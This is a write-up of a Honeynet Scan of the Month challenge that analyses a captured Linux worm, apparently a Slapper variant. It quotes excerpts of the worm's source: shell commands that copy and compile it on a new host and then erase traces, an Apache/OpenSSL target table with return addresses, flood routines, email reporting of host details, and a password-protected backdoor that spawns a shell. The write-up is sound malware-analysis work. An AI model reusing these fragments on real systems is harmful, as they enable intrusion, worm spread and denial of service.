Asby and N|ghtHawk of Mostly Harmless



The Challenge:

Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock), 
was used by the worm to infect the honeypot. Your mission is to analyze the captured file in 
order to answer the questions below. Be sure you review the submission rules at the SotM 
challenge page before submitting your results. 
Questions

1.  Which is the type of the .unlock file? When was it generated? 
2.  Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1? 
3.  Which process name is used by the worm when it is running? 
4.  In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, 

which files remain on the infected machine? 5. Which port is scanned by the worm? 6. Which vulnerability the worm tries to exploit? In which architectures? 7. What kind of information is sent by the worm by email? To which account? 8. Which port (and protocol) is used by the worm to communicate to other infected machines? 9. Name 3 functionalities built in the worm to attack other networks. 10. What is the purpose of the .update.c program? Which port does it use? Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?



Question 1: Which is the type of the .unlock file? When was it generated?

A. Which is the type of the .unlock file? 
  - gzip compressed data

	[email protected]:~/scan$ file .unlock
	.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix

B. When was it generated? 
  - Fri Sep 20 12:59:04 2002

	[email protected]:~/scan$ file .unlock
	.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix
Question 2: Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

A. Based on the source code, who is the author of this worm? 
  - contem ([email protected])
  - modified by aion ([email protected])

	[email protected]:~/scan$ head -4 .unlock.c |tail -2
	 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
	 *                         by [email protected]                                  *
	[email protected]:~/scan$ head -38 .unlock.c |tail -1
	 *  some modification done by aion ([email protected])                           *

B. When it was created?
  - Sep 20 15:28

	[email protected]:~/scan$ ls -la |grep .unlock.c
	-rw-r--r--    1 hawkeye  hawkeye     70981 Sep 20 15:28 .unlock.c
 
C. Is it compatible with the date from question 1? 
  - No, the .unlock.c is from a later date than the .unlock file
	.unlock: Fri Sep 20 12:59:04 2002
	.unlock.c: Sep 20 15:28
Question 3: Which process name is used by the worm when it is running?

  - "httpd "

	[email protected]:~/scan$ head -78 .unlock.c |tail -1
	#define PSNAME          "httpd "
Question 4: In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, wich files remain on the infected machine?

A. In wich format the worm copies itself to the new infected machine? 

  - uuencoded

	[email protected]:~/scan$ head -1416 .unlock.c |tail -1
	  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
	[email protected]:~/scan$ head -1421 .unlock.c|tail -1
	  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "



B. Which files are created in the whole process? 
  - /tmp/.unlock.uu
  - /tmp/.unlock
  - /tmp/.unlock.c
  - /tmp/.update.c
  - /tmp/httpd
  - /tmp/update

	[email protected]:~/scan$ head -1424 .unlock.c |tail -4
	  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
	                "tar xzf /tmp/.unlock -C /tmp/;              "
	                "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
	                "gcc -o /tmp/update /tmp/.update.c;\n");


C. After the worm executes itself, wich files remain on the infected machine? 
  - /tmp/.unlock

	[email protected]:~/scan$ head -1428 .unlock.c |tail -4
	  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
	 sleep(3);ockfd,rcv);
	  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
	                "       /tmp/httpd /tmp/update; exit; \n");
Question 5: Which port is scanned by the worm?

  - 80

	[email protected]:~/scan$ head -67 .unlock.c |tail -1
	#define SCANPORT        80
Question 6: Which vulnerability the worm tries to exploit? In which architectures?

A. Which vulnerability the worm tries to exploit? 
  - openSSL

	[email protected]:~/scan$ head -1141 .unlock.c |tail -4
	#include <openssl/ssl.h>
	#include <openssl/rsa.h>
	#include <openssl/x509.h>
	#include <openssl/evp.h>

B. In which architectures? 
  - Gentoo
  - Debian (1.3.26)
  - Red-Hat (1.3.6,1.3.9,1.3.12,1.3.19,1.3.20,1.3.22,1.3.23,1.3.26)
  - Suse (1.3.12,1.3.17,1.3.19,1.3.20,1.3.23)
  - Mandrake (1.3.14,1.3.19,1.3.20,1.3.23)
  - Slackware (1.3.26)

	[email protected]:~/scan$ head -1269 .unlock.c |tail -25
	} architectures[] = {
	        {"Gentoo", "", 0x08086c34},
        	{"Debian", "1.3.26", 0x080863cc},
	        {"Red-Hat", "1.3.6", 0x080707ec},
        	{"Red-Hat", "1.3.9", 0x0808ccc4},
	        {"Red-Hat", "1.3.12", 0x0808f614},
        	{"Red-Hat", "1.3.12", 0x0809251c},
	        {"Red-Hat", "1.3.19", 0x0809af8c},
        	{"Red-Hat", "1.3.20", 0x080994d4},
	        {"Red-Hat", "1.3.26", 0x08161c14},
        	{"Red-Hat", "1.3.23", 0x0808528c},
	        {"Red-Hat", "1.3.22", 0x0808400c},
        	{"SuSE", "1.3.12", 0x0809f54c},
	        {"SuSE", "1.3.17", 0x08099984},
        	{"SuSE", "1.3.19", 0x08099ec8},
	        {"SuSE", "1.3.20", 0x08099da8},
        	{"SuSE", "1.3.23", 0x08086168},
	        {"SuSE", "1.3.23", 0x080861c8},
        	{"Mandrake", "1.3.14", 0x0809d6c4},
	        {"Mandrake", "1.3.19", 0x0809ea98},
	        {"Mandrake", "1.3.20", 0x0809e97c},
	        {"Mandrake", "1.3.23", 0x08086580},
	        {"Slackware", "1.3.26", 0x083d37fc},
	        {"Slackware", "1.3.26",0x080b2100}
	};
Question 7: What kind of information is sent by the worm by email? To which account?

A. What kind of information is sent by the worm by email? 
  - hostid
  - hostname
  - ip

	[email protected]:~/scan$ head -124 .unlock.c |tail -3
	  sprintf(cmdbuf," hostid:   %d \r\n"
        	         " hostname: %s \r\n"
                	 " att_from: %s \r\n",gethostid(),buffer,sip);

B. To which account? 
  - [email protected]

	[email protected]:~/scan$ head -77 .unlock.c |tail -1
	#define MAILTO          "[email protected]"
Question 8: Which port (and protocol) is used by the worm to communicate to other infected machines?

  - Port : 4156
  - Protocol : UDP

	[email protected]:~/scan$ head -66 .unlock.c |tail -1
	#define PORT            4156
	[email protected]:~/scan$ head -3 .unlock.c |tail -1
	 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
Question 9: Name 3 functionalities built in the worm to attack other networks.

  - UDP flood
  - TCP flood (IPv4 and IPv6)
  - DNS flood

	[email protected]:~/scan$ head -2205 .unlock.c |tail -1
	                                        case 0x29: { // Udp flood
	[email protected]:~/scan$ head -2246 .unlock.c |tail -1
        	                                case 0x2A: { // Tcp flood
	[email protected]:~/scan$ head -2279 .unlock.c |tail -1
        	                                case 0x2B: { // IPv6 Tcp flood
	[email protected]:~/scan$ head -2308 .unlock.c |tail -1
        	                                case 0x2C: { // Dns flood
Question 10: What is the purpose of the .update.c program? Which port does it use?

A. What is the purpose of the .update.c program? 
  - .update.c listens on a port and will execute the command which it gets. It seems to be a password protected 
    backdoor. After the command is executed, the script exits, so it may be a way to rebackdoor the machine 
    with another backdoor.

	[email protected]:~/scan$ head -66 .update.c|tail -4
        	        if( !strncmp(temp_buff,PASS,strlen(PASS)) )
                	  execl("/bin/sh","sh -i",(char *)0);
                	closeall();
                	exit(0);


B. Which port does it use?
  - 1052

	[email protected]:~/scan$ head -4 .update.c|tail -1
	#define PORT      1052


Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

  - The SLEEPTIME lets the script sleep for 5 minutes (300 seconds), en the UPTIME lets the script listen to the port 
    for 10 seconds. This way the port wont seem to respons when people connect to it or try to use/scan it.

	[email protected]:~/scan$ head -7 .update.c|tail -2
	#define SLEEPTIME 300          // sleep  5 min.
	#define UPTIME    10           // listen 10 sec.
	[email protected]:~/scan$ head -52 .update.c|tail -1
        	for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
	[email protected]:~/scan$ head -73 .update.c|tail -1
        	sleep(SLEEPTIME);

Conclusion

The .unlock file seems to be the Linux.Worm.Slapper.C.


Asby and N|ghtHawk
Mostly Harmless